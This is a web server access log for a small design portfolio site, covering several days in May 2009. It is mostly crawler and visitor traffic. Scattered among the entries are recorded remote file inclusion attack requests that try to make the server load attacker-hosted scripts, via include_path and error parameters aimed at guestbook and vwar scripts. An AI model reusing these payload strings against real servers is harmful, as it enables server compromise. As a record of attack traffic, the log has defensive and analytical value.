87.74.72.135 - - [26/May/2009:10:57:50 +0100] "GET /index.jpg HTTP/1.1" 200 225683 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" 426 226046
87.74.72.135 - - [26/May/2009:10:57:51 +0100] "GET /indexbutton.jpg HTTP/1.1" 200 153759 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" 432 154123
87.74.72.135 - - [26/May/2009:10:57:56 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" 368 641
87.74.72.135 - - [26/May/2009:10:58:11 +0100] "GET /feidad.html HTTP/1.1" 200 820 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" 605 1177
87.74.72.135 - - [26/May/2009:10:58:12 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://www.decodeine.com/feidad.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" 466 7503734
87.74.72.135 - - [26/May/2009:11:00:29 +0100] "GET /eh7.jpg HTTP/1.1" 200 108297 "http://www.decodeine.com/dec4b.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" 491 108661
66.249.65.198 - - [26/May/2009:11:05:10 +0100] "GET /webalizer/usage_200905.html HTTP/1.1" 200 137369 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 137733
216.129.119.14 - - [26/May/2009:11:09:26 +0100] "GET /webalizer/usage_200806.html HTTP/1.0" 200 150137 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 150462
216.129.119.14 - - [26/May/2009:11:11:16 +0100] "GET /webalizer/usage_200708.html HTTP/1.0" 200 145214 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 145540
216.129.119.14 - - [26/May/2009:11:46:01 +0100] "GET /webalizer/usage_200710.html HTTP/1.0" 200 156141 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 156466
216.129.119.14 - - [26/May/2009:13:19:13 +0100] "GET /webalizer/usage_200709.html HTTP/1.0" 200 143580 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 143906
77.221.130.2 - - [26/May/2009:13:59:08 +0100] "GET /log/error.log//guestbook1//admin.php?include_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 383 "-" "libwww-perl/5.805" 201 629
77.221.130.2 - - [26/May/2009:13:59:12 +0100] "GET /log/error.log/guestbook1//admin.php?include_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 382 "-" "libwww-perl/5.805" 200 628
77.221.130.2 - - [26/May/2009:13:59:53 +0100] "GET //guestbook1//admin.php?include_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 368 "-" "libwww-perl/5.805" 187 614
77.221.130.2 - - [26/May/2009:13:59:54 +0100] "GET /log//guestbook1//admin.php?include_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 373 "-" "libwww-perl/5.805" 191 619
77.221.130.2 - - [26/May/2009:14:00:06 +0100] "GET /guestbook1//admin.php?include_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 368 "-" "libwww-perl/5.805" 186 614
77.221.130.2 - - [26/May/2009:14:00:06 +0100] "GET /log/guestbook1//admin.php?include_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 372 "-" "libwww-perl/5.805" 190 618
216.129.119.14 - - [26/May/2009:14:30:31 +0100] "GET /webalizer/usage_200507.html HTTP/1.0" 200 77340 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 77664
202.47.1.97 - - [26/May/2009:14:46:33 +0100] "GET /log///?custompluginfile%5B%5D=http://66.7.56.125/test.txt?? HTTP/1.1" 200 3189 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" 248 3423
202.47.1.97 - - [26/May/2009:14:46:33 +0100] "GET ///?custompluginfile%5B%5D=http://66.7.56.125/test.txt?? HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" 244 1587
195.95.205.9 - - [26/May/2009:14:46:34 +0100] "GET ///vwar/backup/errors.php?error=http://66.7.56.125/test.txt?? HTTP/1.1" 404 369 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" 214 615
195.95.205.9 - - [26/May/2009:14:46:35 +0100] "GET /log///vwar/backup/errors.php?error=http://66.7.56.125/test.txt?? HTTP/1.1" 404 375 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" 218 621
65.99.192.2 - - [26/May/2009:14:47:21 +0100] "GET ///vwar/backup/errors.php?error=http://66.7.56.125/test.txt?? HTTP/1.1" 404 369 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" 229 615
65.99.192.2 - - [26/May/2009:14:47:21 +0100] "GET /log///vwar/backup/errors.php?error=http://66.7.56.125/test.txt?? HTTP/1.1" 404 375 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" 233 621
194.204.8.85 - - [26/May/2009:14:47:34 +0100] "GET ///vwar/backup/errors.php?error=http://66.7.56.125/test.txt?? HTTP/1.1" 404 369 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" 215 615
194.204.8.85 - - [26/May/2009:14:47:34 +0100] "GET /log///vwar/backup/errors.php?error=http://66.7.56.125/test.txt?? HTTP/1.1" 404 375 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" 219 621
193.6.189.162 - - [26/May/2009:14:48:15 +0100] "GET /log///vwar/backup/errors.php?error=http://66.7.56.125/test.txt?? HTTP/1.1" 404 375 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" 255 621
193.6.189.162 - - [26/May/2009:14:48:15 +0100] "GET ///vwar/backup/errors.php?error=http://66.7.56.125/test.txt?? HTTP/1.1" 404 369 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" 251 615
74.6.17.154 - - [26/May/2009:14:54:05 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.17.154 - - [26/May/2009:14:54:05 +0100] "GET /log/?D=D HTTP/1.0" 200 3184 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 373 3418
208.80.195.51 - - [26/May/2009:18:42:49 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ZangoToolbar 4.8.3; yplus 5.1.02b)" 142 1587
220.181.61.234 - - [26/May/2009:19:08:13 +0100] "GET / HTTP/1.1" 200 1266 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 275 1587
66.235.124.4 - - [27/May/2009:00:11:54 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 221 641
66.235.124.4 - - [27/May/2009:00:12:09 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 246 1587
124.115.1.7 - - [27/May/2009:03:00:04 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
124.115.1.8 - - [27/May/2009:03:11:22 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.140 - - [27/May/2009:03:12:40 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.139 - - [27/May/2009:03:12:47 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.140 - - [27/May/2009:03:24:12 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
124.115.0.23 - - [27/May/2009:03:39:35 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
114.80.93.71 - - [27/May/2009:04:31:08 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
74.6.17.154 - - [27/May/2009:05:14:58 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.17.154 - - [27/May/2009:05:14:58 +0100] "GET /feidad.html HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 468 216
66.249.71.246 - - [27/May/2009:05:16:08 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.246 - - [27/May/2009:05:16:08 +0100] "GET /webalizer/usage_200708.html HTTP/1.1" 200 145214 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 145577
66.249.71.246 - - [27/May/2009:05:27:50 +0100] "GET /webalizer/usage_200608.html HTTP/1.1" 200 103878 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 104241
74.6.17.154 - - [27/May/2009:07:55:10 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 365 1587
216.129.119.14 - - [27/May/2009:08:21:54 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
66.249.71.246 - - [27/May/2009:08:57:18 +0100] "GET /decodeine.htm HTTP/1.1" 404 360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 244 644
66.249.71.246 - - [27/May/2009:08:57:19 +0100] "GET /yellowdrag2.swf HTTP/1.1" 404 362 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 246 645
58.61.164.141 - - [27/May/2009:10:31:40 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.141 - - [27/May/2009:10:34:38 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
89.74.142.42 - - [27/May/2009:10:57:12 +0100] "GET / HTTP/1.1" 200 1266 "http://tourist.bl0x.info/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 232 1625
89.74.142.42 - - [27/May/2009:10:57:12 +0100] "GET / HTTP/1.1" 200 1266 "http://afrika.megatorrent.info/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 238 1625
89.74.142.42 - - [27/May/2009:10:57:12 +0100] "GET / HTTP/1.1" 200 1266 "http://buss.darmowe-bajki.pl/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 236 1625
89.74.142.42 - - [27/May/2009:10:57:12 +0100] "GET / HTTP/1.1" 200 1266 "http://videos.megatorrent.info" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 237 1625
66.249.71.246 - - [27/May/2009:11:05:09 +0100] "GET /webalizer/usage_200905.html HTTP/1.1" 200 139942 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 353 140306
189.31.238.77 - - [27/May/2009:14:20:11 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" 281 7503697
58.61.164.39 - - [27/May/2009:15:44:35 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
216.129.119.14 - - [27/May/2009:15:44:52 +0100] "GET /log/?C=S;O=A HTTP/1.0" 200 3184 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 201 3418
58.61.164.40 - - [27/May/2009:15:48:49 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
81.178.65.67 - - [27/May/2009:16:06:40 +0100] "GET / HTTP/1.1" 200 1266 "http://www.creativematch.co.uk/viewlisting/?61705&c=1&sc=Choose%20Sub%20Category&criteria=&postcode=&504040675443" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3" 497 1625
81.178.65.67 - - [27/May/2009:16:06:40 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "http://www.decodeine.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3" 324 642
81.178.65.67 - - [27/May/2009:16:06:40 +0100] "GET /indexbutton.jpg HTTP/1.1" 200 153759 "http://www.decodeine.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3" 328 154122
81.178.65.67 - - [27/May/2009:16:06:40 +0100] "GET /index.jpg HTTP/1.1" 200 225683 "http://www.decodeine.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3" 322 226047
81.178.65.67 - - [27/May/2009:16:06:48 +0100] "GET /feidad.html HTTP/1.1" 200 820 "http://www.decodeine.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3" 420 1177
81.178.65.67 - - [27/May/2009:16:06:48 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://www.decodeine.com/feidad.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3" 333 7503734
93.158.151.24 - - [27/May/2009:17:05:23 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Yandex/1.01.001 (compatible; Win16; I)" 155 641
93.158.151.24 - - [27/May/2009:17:05:24 +0100] "GET / HTTP/1.1" 200 1266 "-" "Yandex/1.01.001 (compatible; Win16; I)" 450 1624
216.129.119.14 - - [27/May/2009:18:11:00 +0100] "GET /webalizer/usage_200710.html\\r HTTP/1.0" 404 376 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 218 622
208.80.195.31 - - [27/May/2009:20:19:48 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {A7AB7187-6D67-4442-AF3F-550AF53A9E73}; SV1; .NET CLR 1.0.3705)" 171 1587
193.47.80.50 - - [27/May/2009:21:05:59 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 260 603
193.47.80.50 - - [27/May/2009:21:05:59 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 342 216
219.234.81.33 - - [27/May/2009:21:30:15 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "-" 73 584
219.234.81.33 - - [27/May/2009:21:30:18 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Avant Browser; InfoPath.1; .NET CLR 2.0.50727; .NET CLR1.1.4322)" 376 1587
65.55.232.29 - - [27/May/2009:22:22:19 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 208 603
65.55.232.29 - - [27/May/2009:22:22:19 +0100] "GET / HTTP/1.1" 200 1266 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 198 1587
66.249.71.246 - - [28/May/2009:00:32:17 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Googlebot-Image/1.0" 205 641
66.249.71.246 - - [28/May/2009:00:32:17 +0100] "GET /hs18.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 255
124.115.0.22 - - [28/May/2009:03:33:31 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
216.129.119.14 - - [28/May/2009:04:48:52 +0100] "GET /decodeine.htm HTTP/1.0" 404 360 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 202 606
74.6.17.154 - - [28/May/2009:07:02:28 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.17.154 - - [28/May/2009:07:02:29 +0100] "GET /log/?N=D HTTP/1.0" 200 3184 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 373 3418
66.249.71.246 - - [28/May/2009:07:17:33 +0100] "GET /webalizer/usage_200712.html HTTP/1.1" 200 154783 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 155146
66.249.71.246 - - [28/May/2009:07:34:14 +0100] "GET /webalizer/usage_200709.html HTTP/1.1" 200 143580 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 143944
216.129.119.14 - - [28/May/2009:08:07:03 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
66.249.71.246 - - [28/May/2009:11:04:53 +0100] "GET /webalizer/usage_200905.html HTTP/1.1" 200 140964 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 353 141328
216.129.119.14 - - [28/May/2009:14:52:22 +0100] "GET /log/?C=D;O=A HTTP/1.0" 200 3184 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 201 3418
220.181.61.234 - - [28/May/2009:18:38:12 +0100] "GET / HTTP/1.1" 200 1266 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 275 1587
66.235.124.4 - - [29/May/2009:01:23:32 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 221 641
66.235.124.4 - - [29/May/2009:01:23:47 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 246 1587
130.216.180.83 - - [29/May/2009:01:58:05 +0100] "GET /bs16.jpg HTTP/1.1" 200 149499 "http://images.google.co.nz/imgres?imgurl=http://www.decodeine.com/bs16.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__zDl8-KWbLYlyYDBZ5DwDQdDrcqI=&h=363&w=347&sz=146&hl=en&start=37&sig2=FCcyoAsRl_P8sjPvluAfhA&um=1&tbnid=7XKuYOdAKXqMKM:&tbnh=121&tbnw=116&prev=/images%3Fq%3Dexploded%2Baxonometric%2Bpods%26ndsp%3D20%26hl%3Den%26rlz%3D1T4GPEA_enNZ311%26sa%3DN%26start%3D20%26um%3D1&ei=FTMfSsuUIJi4sgOC9tGYCQ" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 1037 149863
130.216.180.83 - - [29/May/2009:01:58:15 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 324 641
130.216.180.83 - - [29/May/2009:01:58:19 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://images.google.co.nz/imgres?imgurl=http://www.decodeine.com/bs16.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__zDl8-KWbLYlyYDBZ5DwDQdDrcqI=&h=363&w=347&sz=146&hl=en&start=37&sig2=FCcyoAsRl_P8sjPvluAfhA&um=1&tbnid=7XKuYOdAKXqMKM:&tbnh=121&tbnw=116&prev=/images%3Fq%3Dexploded%2Baxonometric%2Bpods%26ndsp%3D20%26hl%3Den%26rlz%3D1T4GPEA_enNZ311%26sa%3DN%26start%3D20%26um%3D1&ei=FTMfSsuUIJi4sgOC9tGYCQ" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 1038 67160
80.237.146.58 - - [29/May/2009:02:12:58 +0100] "GET /log/error.log///vwar/backup/errors.php?error=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 385 "-" "libwww-perl/5.76" 206 631
80.237.146.58 - - [29/May/2009:02:12:58 +0100] "GET ///vwar/backup/errors.php?error=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 369 "-" "libwww-perl/5.76" 192 615
80.237.146.58 - - [29/May/2009:02:12:58 +0100] "GET /log///vwar/backup/errors.php?error=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 375 "-" "libwww-perl/5.76" 196 621
124.115.0.160 - - [29/May/2009:02:36:56 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
216.129.119.14 - - [29/May/2009:02:46:51 +0100] "GET /log/?C=S;O=D HTTP/1.0" 200 3184 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 201 3418
66.249.71.237 - - [29/May/2009:03:06:05 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Googlebot-Image/1.0" 205 641
66.249.71.237 - - [29/May/2009:03:06:05 +0100] "GET /bs02.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 255
216.129.119.14 - - [29/May/2009:03:23:31 +0100] "GET /log/?C=N;O=A HTTP/1.0" 200 3184 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 201 3418
216.129.119.14 - - [29/May/2009:08:23:52 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
65.55.105.53 - - [29/May/2009:10:33:17 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 208 603
65.55.105.53 - - [29/May/2009:10:33:18 +0100] "GET /feidad.html HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 259 216
216.129.119.14 - - [29/May/2009:10:42:32 +0100] "GET /webalizer/usage_200612.html HTTP/1.0" 200 103876 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 104201
66.249.71.237 - - [29/May/2009:11:05:34 +0100] "GET /webalizer/usage_200905.html HTTP/1.1" 200 141868 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 353 142232
66.249.71.237 - - [29/May/2009:13:00:44 +0100] "GET /webalizer/usage_200608.html HTTP/1.1" 200 103878 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 104241
216.129.119.14 - - [29/May/2009:14:58:37 +0100] "GET /log/?C=M;O=A HTTP/1.0" 200 3184 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 201 3418
58.61.164.207 - - [29/May/2009:15:11:20 +0100] "GET /robots.txt HTTP/1.1" 404 357 "http://www.decodeine.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 263 641
201.243.80.60 - - [29/May/2009:15:52:51 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" 281 7503697
85.92.222.254 - - [29/May/2009:18:46:50 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/4.0" 207 1625
213.34.194.250 - - [29/May/2009:18:46:51 +0100] "GET / HTTP/1.1" 200 1266 "http://www.chimehost.com" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 293 1625
213.34.194.254 - - [29/May/2009:18:46:51 +0100] "GET /indexbutton.jpg HTTP/1.1" 200 153759 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 309 154123
213.34.194.254 - - [29/May/2009:18:46:51 +0100] "GET /index.jpg HTTP/1.1" 200 225683 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 303 226047
216.129.119.14 - - [29/May/2009:20:54:38 +0100] "GET /log/?C=N;O=D HTTP/1.0" 200 3184 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 201 3418
66.249.71.237 - - [29/May/2009:22:18:38 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.237 - - [29/May/2009:22:18:38 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 231 1624
208.80.195.34 - - [29/May/2009:22:37:10 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Hotbar 4.5.0.0; .NET CLR 1.1.4322)" 142 1587
209.202.168.75 - - [29/May/2009:22:54:02 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" 237 603
209.202.168.75 - - [29/May/2009:22:54:02 +0100] "GET / HTTP/1.0" 200 1266 "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" 227 1587
124.115.4.194 - - [30/May/2009:02:44:17 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
209.202.168.82 - - [30/May/2009:03:28:44 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" 237 603
